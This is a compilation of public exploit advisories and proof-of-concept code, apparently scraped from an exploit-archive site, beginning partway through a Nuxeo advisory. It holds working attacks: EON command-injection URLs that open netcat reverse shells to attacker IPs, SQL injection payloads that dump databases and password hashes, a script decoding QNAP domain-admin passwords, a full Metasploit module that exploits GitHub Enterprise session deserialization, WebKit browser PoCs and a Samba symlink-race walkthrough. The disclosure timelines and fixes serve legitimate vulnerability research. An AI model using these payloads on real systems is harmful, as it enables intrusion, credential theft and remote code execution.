uid=1000(nuxeo) gid=1000(nuxeo)
groups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
pwd
/var/lib/nuxeo/server
```

# Vulnerable code

The vulnerable code is located in the
`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github
link](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),
where the header ``X-File-Name`` is not checked.

# Fix

Nuxeo provided a
[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)
for this issue.
A hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).

Please note that vulnerability does not affect Nuxeo versions above 7.3.

# Affected versions

* Nuxeo 6.0 (LTS 2014), released 2014-11-06
* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15
* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24
* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24

# Unaffected versions

* Nuxeo 6.0 HF35, released 2017-01-12
* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02
* Nuxeo 7.10 (LTS 2015), released 2015-11-09
* Nuxeo 8.10 (LTS 2016), released 2016-12-06

# Credits

Ronan Kervella <r.kervella@sysdream.com>

-- SYSDREAM Labs <labs@sysdream.com> 
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
* Website: https://sysdream.com/ 
* Twitter: @sysdream 
=end
HireHackking 
# [CVE-2017-6087] EON 5.0 Remote Code Execution

## Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

## Remote Code Execution (authenticated)

The Eonweb code does not correctly filter arguments, allowing
authenticated users to execute arbitrary code.

**CVE ID**: CVE-2017-6087

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-78

**CVSS Base Score**: 7.6

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L


### Proof of Concept 1

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `selected_events` parameter is not correctly filtered before it is
used by the `shell_exec()` function.

There, it is possible to inject a payload like in the request below,
where we connect back to our handler:

```
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
```

#### Vulnerable code

The payload gets injected into the `$event[$key]` and `$ged_command`
variables of the `module/monitoring_ged/ged_functions.php` file, line 373:

```
$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
  if($value["type"] == true){
    if($key == "owner"){
      $event[$key] = $owner;
    }
    $ged_command .= "\"".$event[$key]."\" ";
  }
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);
```

Two other functions in this file are also affected by this problem:

* `delete($selected_events, $queue);`
* `ownDisown($selected_events, $queue, $global_action);`


### Proof of Concept 2

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `module` parameter is not correctly filtered before it is used by
the `shell_exec()` function.

Again, we inject our connecting back payload:

```
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
```

#### Vulnerable code

In the `module/index.php` file, line 24, we can see that our payload is
injected into the `exec()` function without any sanitization:

```
# Check optionnal module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {

	$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");

	# Redirect to module page if rpm installed
	if($module!=0) { header('Location: '.$_GET["link"].''); }

}
```


## Timeline (dd/mm/yyyy)

* 01/10/2016 : Initial discovery.
* 09/10/2016 : Fisrt contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
* 11/10/2016 : Testing the patch revealed that it needed more work.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
repsonsible disclosure agreement.
* 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

## Solution

Update to version 5.1

## Affected versions

* Version <= 5.0

## Credits

* Nicolas SERRA <n.serra@sysdream.com>

-- SYSDREAM Labs <labs@sysdream.com> 
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
* Website: https://sysdream.com/ * 
Twitter: @sysdream
HireHackking 
# [CVE-2017-6088] EON 5.0 Multiple SQL Injection

## Description

EyesOfNetwork ("EON") is an OpenSource network monitoring solution.

## SQL injection (authenticated)

The Eonweb code does not correctly filter arguments, allowing
authenticated users to inject arbitrary SQL requests.

**CVE ID**: CVE-2017-6088

**Access Vector**: remote

**Security Risk**: medium

**Vulnerability**: CWE-89

**CVSS Base Score**: 6.0

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L

### Proof of Concept 1 (root privileges)

The following HTTP request allows an attacker (connected as
administrator) to dump the database contents using SQL injections inside
either the `bp_name` or the `display` parameter. These requests are
executed with MySQL root privileges.

```
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271

https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1
```

#### Vulnerable code

The vulnerable code can be found inside the
`module/monitoring_ged/ged_functions.php` file, line 114:

```
function list_process($bp,$display,$bdd){
    $sql = "select name from bp where is_define = 1 and name!='".$bp."'
and priority = '" . $display . "'";
    $req = $bdd->query($sql);
    $process = $req->fetchall();

    echo json_encode($process);
}
```

### Proof of Concept 2

The following HTTP request allows an attacker to dump the database
contents using SQL injections inside the `type` parameter:

```
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
```

#### Vulnerable code

The vulnerable code can be found inside the
`module/monitoring_ged/ajax.php` file, line 64:

```
if($_GET["type"] == 0){
  $ged_where = "WHERE pkt_type_id!='0'";
} else {
  $ged_where = "WHERE pkt_type_id='".$_GET["type"]."'";
}
$gedsql_result1=sqlrequest($database_ged,"SELECT
pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';");
```

### Proof of Concept 3

The following HTTP request allows an attacker to dump the database
contents using SQL injections inside the `search` parameter:

```
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
```


#### Vulnerable code

The vulnerable code can be found inside the
`module/monitoring_ged/ged_functions.php` file, line 129.

```
if($search != ""){
    $like = "";
    if( substr($search, 0, 1) === '*' ){
        $like .= "%";
    }
    $like .= trim($search, '*');
    if ( substr($search, -1) === '*' ) {
        $like .= "%";
    }

    $where_clause .= " AND $filter LIKE '$like'";
}
```


### Proof of Concept 4

The following HTTP request allows an attacker to dump the database
contents using SQL injections inside the `equipment` parameter:

```
https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit
1)&queue=history
```


#### Vulnerable code

The vulnerable code can be found inside the
`module/monitoring_ged/ged_functions.php` file, line 493:

```
$gedsql_result1=sqlrequest($database_ged,"SELECT
pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND
pkt_type_id<'100';");


while($ged_type = mysqli_fetch_assoc($gedsql_result1)){
    $sql = "SELECT DISTINCT $filter FROM
".$ged_type["pkt_type_name"]."_queue_".$queue;

    $results = sqlrequest($database_ged, $sql);
    while($result = mysqli_fetch_array($results)){
        if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){
            array_push($datas, $result[$filter]);
        }
    }
}
```


## Timeline (dd/mm/yyyy)

* 01/10/2016 : Initial discovery.
* 09/10/2016 : Fisrt contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
repsonsible disclosure agreement.
* 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

## Solution

Update to version 5.1.

## Affected versions

* Version <= 5.0

## Credits

* Nicolas SERRA <n.serra@sysdream.com>

-- SYSDREAM Labs <labs@sysdream.com> 
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
* Website: https://sysdream.com/ 
* Twitter: @sysdream
HireHackking 
QNAP QTS Domain Privilege Escalation Vulnerability

 Name              Sensitive Data Exposure in QNAP QTS
 Systems Affected  QNAP QTS (NAS) all model and all versions < 4.2.4
 Severity          High 7.9/10
 Impact            CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
 Vendor            http://www.qnap.com/
 Advisory          http://www.ush.it/team/ush/hack-qnap/qnap.txt
 Authors           Pasquale "sid" Fiorillo (sid AT ush DOT it) 
                   Guido "go" Oricchio (g.oricchio AT pcego DOT com)
 Date              20170322

I. BACKGROUND

QNAP Systems, founded in 2004, provides network attached storage (NAS)
and network video recorder (NVR) solutions for home and business use to
the global market.
QNAP also delivers a cloud service, called myQNAPcloud, that allows
users to access and manage the devices from anywhere.
QTS is a QNAP devices proprietary firmware based on Linux.

ISGroup (http://www.isgroup.biz/) is an Italian Information Security 
boutique, we found this 0day issue while supporting Guido Oricchio 
of PCego, a System Integrator, to secure a QNAP product for one of his
customer.

Responsible disclosure with Qnap: we contacted qnap on public security@
contact and we escalate fast to their Security Researcher Myron Su on
PGP emails.

Prior vulnerabilities in QNAP: 
https://www.qnap.com/en/support/con_show.php?op=showone&cid=41

Information to customers of the vulnerability is shown in their bulletin
ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113):
QTS 4.2.4 Build 20170313 includes security fixes for the following
vulnerabilities: Configuration file vulnerability (CVE-2017-5227)
reported by Pasquale Fiorillo of the cyber security company ISGroup
(www.isgroup.biz), a cyber security company, and Guido Oricchio of
PCego (www.pcego.com), a system integrator.

The latest version of the software at the time of writing can be 
obtained from:

https://www.qnap.com/en-us/product_x_down/
https://start.qnap.com/en/index.php
https://www.qnap.com/

II. DESCRIPTION

The vulnerability allows a local QTS admin user, or other low privileged
user, to access configuration file that includes a bad crypted Microsoft
Domain Administrator password if the NAS was joined to a Microsoft 
Active Directory domain.

The affected component is the "uLinux.conf" configuration file, 
created with a world-readable permission used to store a Domain 
Administrator password.

Admin user can access the file using ssh that is enabled by default.
Other users are not allowed to login, so they have to exploit a 
component, such as a web application, to run arbitrary command or 
arbitrary file read.

TLDR: Anyone is able to read uLinux.conf file, world readable by 
default, can escalate to Domain Administrator if a NAS is a domain 
member.

III. ANALYSIS

QNAP QTS stores "uLinux.conf" configuration file in a directory 
accessible by "nobody" and with permission that make them readable by 
"nobody".

If the NAS was joined to an Active Directory, such file contain a Domain
Administrator user and password in an easily decrypt format.

In older versions of QTS the Domain Admin's password was stored in
plaintext.

A) Config file readable by "nobody"

  [~] # ls -l /etc/config/uLinux.conf 
  -rw-r--r--    1 admin    administ      7312 Dec 10 06:39 /etc/config/uLinux.conf

  Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, 
  TS-469L, and TS-221. Access to the needed file are guaranteed to 
  all the local users, such as httpdusr used to running web sites and 
  web application hosted on the NAS.

  This expose all the information contained in the configuration file at
  risk and this is a violation of the principle of least privilege.

  https://en.wikipedia.org/wiki/Principle_of_least_privilege

B) Weak encrypted password in the configuration file

  The Microsoft Active Directory Admin username and password are stored 
  in the file obfuscated by a simple XOR cypher and base64 encoded.

  In this scenario, a Local File Read vulnerability could lead to full
  domain compromise given the fact that an attacker can re-use such
  credentials to authenticate against a Domain Controller with maximum
  privileges.

  The password field in the uLinux.conf has the following format:

  User = <username>
  Password = <base64>

  eg: 
  User = Administrator
  Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==

  The "<base64>" decoded is:

  sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C
  00000000  03 03 00 00 01 01 06 06  07 07 04 04 23 23 20 20  |............##  |
  00000010  21 21 26 26 27 27 24 24  43                       |!!&&''$$C|
  00000019

  Each byte xored with \x62 is the hex ascii code of the plaintext char.
  Eg: 
    \x03 ^ \x62 = \x61 (a)
    \x00 ^ \x62 = \x61 (b)
    ...
    \x24 ^ \x62 = \x46 (F)
    \x43 ^ \x62 = \x21 (!)
    
  The plaintext password is: aabbccddeeffAABBCCDDEEFF!

IV. EXPLOIT

The following code can be used to decode the password:

#!/usr/bin/php
<?php
$plaintext = str_split(base64_decode($argv[1]));
foreach($plaintext as $chr) {
	echo chr(ord($chr)^0x62);
}
echo "\n";

Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==
aabbccddeeffAABBCCDDEEFF!

V. VENDOR RESPONSE
Vendor released QTS 4.2.4 Build 20170313 that contains the proper
security patch. At the time of this writing an official patch is
currently available.

VI. CVE INFORMATION

Mitre assigned the CVE-2017-5227 for this vulnerability, internally to
Qnap it's referred as Case NAS-201703-21.

VII. DISCLOSURE TIMELINE

20161212 Bug discovered
20170106 Request for CVE to Mitre
20170106 Disclosure to security@qnap.com
20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!)
20170107 Details disclosure to Myron Su
20170109 Got CVE-CVE-2017-5227 from cve-assign
20170110 Myron Su confirm the vulnerability
20170203 We asks for updates, no release date from vendor
20170215 We extend the disclosure date as 28 Feb will not be met
20170321 QNAP releases the QTS 4.2.4 Build 20170313
20170322 Advisory disclosed to the public

VIII. REFERENCES

[1] Top 10 2013-A6-Sensitive Data Exposure
    https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure

[2] Access Control Cheat Sheet
    https://www.owasp.org/index.php/Access_Control_Cheat_Sheet

[3] https://forum.qnap.com/viewtopic.php?t=68317
    20121213 User reporting that the password was stored in plaintext in
    a world-readable file
    
[4] https://www.qnap.com/en/support/con_show.php?cid=113
    Qnap Security Bullettin NAS-201703-21 

IX. CREDIT

Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the 
discovery of this vulnerability.

Pasquale "sid" Fiorillo
web site: http://www.pasqualefiorillo.it/
mail: sid AT ush DOT it

Guido "go" Oricchio
web site: http://www.pcego.com/
mail: g.oricchio AT pcego DOT com

X. LEGAL NOTICES

Copyright (c) 2017 Pasquale "sid" Fiorillo

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Github Enterprise Default Session Secret And Deserialization Vulnerability",
      'Description'    => %q{
        This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.
        The first is that the session management uses a hard-coded secret value, which can be
        abused to sign a serialized malicious Ruby object. The second problem is due to the
        use of unsafe deserialization, which allows the malicious Ruby object to be loaded,
        and results in arbitrary remote code execution.

        This exploit was tested against version 2.8.0.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'iblue <iblue[at]exablue.de>', # Original discovery, writeup, and PoC (he did it all!)
          'sinn3r'                       # Porting the PoC to Metasploit
        ],
      'References'     =>
        [
          [ 'EDB', '41616' ],
          [ 'URL', 'http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html' ],
          [ 'URL', 'https://enterprise.github.com/releases/2.8.7/notes' ] # Patched in this version
        ],
      'Platform'       => 'linux',
      'Targets'        =>
        [
          [ 'Github Enterprise 2.8', { } ]
        ],
      'DefaultOptions' =>
        {
          'SSL'   => true,
          'RPORT' => 8443
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 15 2017',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path for Github Enterprise', '/'])
      ], self.class)
  end

  def secret
    '641dd6454584ddabfed6342cc66281fb'
  end

  def check
    uri = normalize_uri(target_uri.path, 'setup', 'unlock')
    res = send_request_cgi!({
      'method' => 'GET',
      'uri'    => uri,
      'vars_get' =>{
        'redirect_to' => '/'
      }
    })

    unless res
      vprint_error('Connection timed out.')
      return Exploit::CheckCode::Unknown
    end

    unless res.get_cookies.match(/^_gh_manage/)
      vprint_error('No _gh_manage value in cookie found')
      return Exploit::CheckCode::Safe
    end

    cookies = res.get_cookies
    vprint_status("Found cookie value: #{cookies}, checking to see if it can be tampered...")
    gh_manage_value = CGI.unescape(cookies.scan(/_gh_manage=(.+)/).flatten.first)
    data = gh_manage_value.split('--').first
    hmac = gh_manage_value.split('--').last.split(';', 2).first
    vprint_status("Data: #{data.gsub(/\n/, '')}")
    vprint_status("Extracted HMAC: #{hmac}")
    expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
    vprint_status("Expected HMAC: #{expected_hmac}")

    if expected_hmac == hmac
      vprint_status("The HMACs match, which means you can sign and tamper the cookie.")
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def get_ruby_code
    b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin"
    bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin"
    register_file_for_cleanup(b64_fname, bin_fname)
    p = Rex::Text.encode_base64(generate_payload_exe)

    c  = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
    c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); "
    c << "%x(chmod +x #{bin_fname}); "
    c << "%x(#{bin_fname})"
    c
  end


  def serialize
    # We don't want to run this code within the context of Framework, so we run it as an
    # external process.
    # Brilliant trick from Brent and Adam to overcome the issue.
    ruby_code = %Q|
    module Erubis;class Eruby;end;end
    module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end

    erubis = Erubis::Eruby.allocate
    erubis.instance_variable_set :@src, \\"#{get_ruby_code}; 1\\"
    proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
    proxy.instance_variable_set :@instance, erubis
    proxy.instance_variable_set :@method, :result
    proxy.instance_variable_set :@var, "@result"

    session =
    {
      'session_id' => '',
      'exploit'    => proxy
    }

    print Marshal.dump(session)
    |

    serialized_output = `ruby -e "#{ruby_code}"`

    serialized_object = [serialized_output].pack('m')
    hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, serialized_object)

    return serialized_object, hmac
  end

  def send_serialized_data(dump, hmac)
    uri = normalize_uri(target_uri.path)
    gh_manage_value = CGI.escape("#{dump}--#{hmac}")
    cookie = "_gh_manage=#{gh_manage_value}"
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri,
      'cookie' => cookie
    })

    if res
      print_status("Server returned: #{res.code}")
    end
  end

  def exploit
    dump, hmac = serialize
    print_status('Serialized Ruby stager')

    print_status('Sending serialized Ruby stager...')
    send_serialized_data(dump, hmac)
  end

end

=begin

Handy information:

To deobfuscate Github code, use this script:
https://gist.github.com/wchen-r7/003bef511074b8bc8432e82bfbe0dd42

Github Enterprise's Rack::Session::Cookie saves the session data into a cookie using this
algorithm:

* Takes the session hash (Json) in env['rack.session']
* Marshal.dump the hash into a string
* Base64 the string
* Append a hash of the data at the end of the string to prevent tampering.
* The signed data is saved in _gh_manage'

The format looks like this:

[ DATA ]--[ Hash ]

Also see:
https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb

=end
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033

There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered), and reads out of bounds.

This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.

This issue is only in WebKit trunk and Safari preview, it hasn't made it to regular Safari releases yet.


A minimal PoC is as follows, and a full PoC is attached.


var ba;

function s(){
	ba = this;
}


function dummy(){
	alert("just a function");
}


Object.defineProperty(Array.prototype, "0", {set : s });
var f = dummy.bind({}, 1, 2, 3, 4);
ba.length = 100000;
f(1, 2, 3);
-->

<html>
<body>
<script>

var ba;

function s(){
	alert("in s");
	ba = this;
}


function g(){
	alert("in g");
	return 7;
}


function dummy(){
	alert("just a function");
}

alert("start");

try{
Object.defineProperty(Array.prototype, "0", {set : s, get : g});
var f = dummy.bind({}, 1, 2, 3, 4);
alert("ba" + ba);
ba.length = 100000;
f(1, 2, 3);
}catch(e){

	alert(e.message);

}

</script>
</body>
</html>
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1032

If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function. This is inconsistent with the behavior when executing non-builtin scripts in Safari, and the behavior in other browsers, where having a single strict function on the call stack forbids calls to Function.caller up to and including the first call to a strict function. This difference allows several sensitive native functions, such as arrayProtoPrivateFuncAppendMemcpy to be called directly, without the JavaScript wrappers that provide type and length checks.

A minimal example of this issue is as follows, and a full example is attached.

var q;
function g(){
	q = g.caller;
	return 7;
}


var a = [1, 2, 3];
a.length = 4;
Object.defineProperty(Array.prototype, "3", {get : g});
[4, 5, 6].concat(a);
q(0x77777777, 0x77777777, 0);


I strongly recommend this issue be fixed by changing the behaviour of Function.caller in strict mode, versus making changes to the natives, as it likely causes many similar problems 
-->

<html>
<body>
<script>

var q;
function g(){
	//print("in g");
	//print(arguments.caller);
	//print(g.caller);
	q = g.caller;
	//print(g.caller);
	return 7;

}

var a = [1, 2, 3];

Object.defineProperty( Array.prototype, "1", { get : g} );


var a = [1, 2, 3];
a.length = 4;
Object.defineProperty(Array.prototype, "3", {get : g});

[4, 5, 6].concat(a);
alert(q);
q(0x7777, 0x7777, 0);

</script>
</body>
</html>
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1036

There is a type confusion vulnerability when calling DateTimeFormat.format. This function is provided as a bound function by a getter in the DateTimeFormat class. Binding the function ensures that the this object is of the right type. However, when the bound function is called, it calls into user script when converting the date parameter, which can call Function.caller, obtaining the unbound function. This type unsafe function can then be called on any type.

A minimal PoC is as follows, and a full PoC is attached. 


var i = new Intl.DateTimeFormat();
var q;

function f(){
	q = f.caller;
	return 10;
}


i.format({valueOf : f});

q.call(0x77777777);
-->

<html>
<body>
<script>

var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));

var i = new Intl.DateTimeFormat();

//print(i);

var q;

function f(){

	//print("in f");
	//print(f.caller);
	q = f.caller;
	return 10;
}

try{
i.format({valueOf : f});
}catch(e){

	//print("problem");

}

//print(q);
q.call(0x77777777);

</script>
</body>
</html>
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039

The Samba server is supposed to only grant access to configured share
directories unless "wide links" are enabled, in which case the server is allowed
to follow symlinks. The default (since CVE-2010-0926) is that wide links are
disabled.

smbd ensures that it isn't following symlinks by calling lstat() on every
path component, as can be seen in strace (in reaction to the request
"get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share):

root@debian:/home/user# strace -e trace=file -p18954
Process 18954 attached
lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
getcwd("/public", 4096)                 = 8
lstat("/public/a", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
getxattr("a/b/c/d/e/f/g/h/i/j", "system.posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available)
stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG|0644, st_size=4, ...}) = 0
open("a/b/c/d/e/f/g/h/i/j", O_RDONLY)   = 35


This is racy: Any of the path components - either one of the directories or the
file at the end - could be replaced with a symlink by an attacker over a second
connection to the same share. For example, replacing a/b/c/d/e/f/g/h/i
with a symlink  to / immediately before the open() call would cause smbd to open
/j.

To reproduce:

 - Set up a server with Samba 4.5.2. (I'm using Samba 4.5.2 from Debian
   unstable. I'm running the attacks on a native machine while the server is
   running in a VM on the same machine.)
 - On the server, create a world-readable file "/secret" that contains some
   text. The goal of the attacker is to leak the contents of that file.
 - On the server, create a directory "/public", mode 0777.
 - Create a share named "public", accessible for guests, writable, with path
   "/public".
 - As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in
   attack_commands.patch.
 - Build the patched copy of samba-4.5.2. The built smbclient will be used in
   the following steps.
 - Prepare the server's directory layout remotely and start the rename side of
   the race:

   $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
   ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
   Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
   smb: \> posix
   Server supports CIFS extensions 1.0
   Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
   smb: /> ls
     .                                   D        0  Wed Dec 14 23:54:30 2016
     ..                                  D        0  Wed Dec 14 13:02:50 2016

        98853468 blocks of size 1024. 66181136 blocks available
   smb: /> symlink / link
   smb: /> mkdir normal
   smb: /> put /tmp/empty normal/secret # empty file
   putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s)
   smb: /> rename_loop link normal foobar

 - Over a second connection, launch the read side of the race:

   $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public
   ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it
   Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian]
   smb: \> posix
   Server supports CIFS extensions 1.0
   Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt
   smb: /> dump foobar/secret

 - At this point, the race can theoretically be hit. However, because the
   renaming client performs operations synchronously, the network latency makes
   it hard to win the race. (It shouldn't be too hard to adapt the SMB client to
   be asynchronous, which would make the attack much more practical.) To make it
   easier to hit the race, log in to the server as root and run "strace" against
   the process that is trying to access foobar/secret all the time without any
   filtering ("strace -p19624"). On my machine, this causes the race to be hit
   every few seconds, and the smbclient that is running the "dump" command
   prints the contents of the file each time the race is won.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41740.zip
HireHackking 
# # # # #
# Exploit Title: Delux Same Day Delivery Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/delux-same-day-delivery
# Demo: http://deluxesameday.logistic-softwares.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/show_page/[PAGE][SQL]
# Etc...
# # # # #
HireHackking 
# # # # #
# Exploit Title: Just Another Video Script 1.4.3 - SQL Injection
# Google Dork: N/A
# Date: 25.03.2017
# Vendor Homepage: http://justanothervideoscript.com/
# Software: http://justanothervideoscript.com/demo
# Demo: http://javsdemo.com/
# Version: 1.4.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajaxglobalfunc.php?func=addfav&vid_id=[SQL]
